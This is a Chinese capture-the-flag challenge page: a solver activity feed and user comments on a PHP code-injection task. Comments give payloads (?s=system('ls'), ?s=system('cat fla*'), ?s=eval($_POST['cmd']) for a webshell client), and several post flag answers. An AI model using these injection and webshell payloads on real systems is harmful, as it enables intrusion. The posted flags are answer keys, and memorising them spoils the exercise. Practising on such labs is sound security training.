评分(8)
解题动态

goodsnack 攻破了该题 1小时前

一羽轻鸿 攻破了该题 13小时前

17823293548 攻破了该题 1天前

1986557251 攻破了该题 1天前

39983317 攻破了该题 1天前

bcxlaaa222 攻破了该题 1天前

silver6969 攻破了该题 1天前

Nacocx 攻破了该题 2天前

LLone1 攻破了该题 2天前

lchey1 攻破了该题 2天前

Tyh050831 攻破了该题 2天前

凯哥 攻破了该题 2天前

18795603206 攻破了该题 2天前

qiaoooo 攻破了该题 2天前

vox123 攻破了该题 3天前

chennuo 攻破了该题 3天前

admin123 攻破了该题 3天前

A-L 攻破了该题 3天前

Justforstar 攻破了该题 3天前

评论
zfly 17天前
举报
?s=system('ls') ?s=system('cat fla*')
八一卜kod 27天前
举报
cat
freestyle 3月前
举报
s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容
000ooo 3月前
举报
?s=eval+($_POST['123'])
ruien 4月前
举报
答案就在描述里,上传的s参数如果是字符串会被当命令执行
112356 4月前
举报
flag{0aa5253236aa8d97368bd753cb3c4cf2}
迷茫的三千面 4月前
举报
flag{f790b1679ece8cfe8ce3fc425c30896b}
星空 4月前
举报
?s=eval($_POST["cmd"]),再用蚁剑连
星空 4月前
举报
?s=eval($_POST["cmd"])
15824777912 4月前
举报
flag{11393cf7e26fe81d89dc60b63d3a1f52}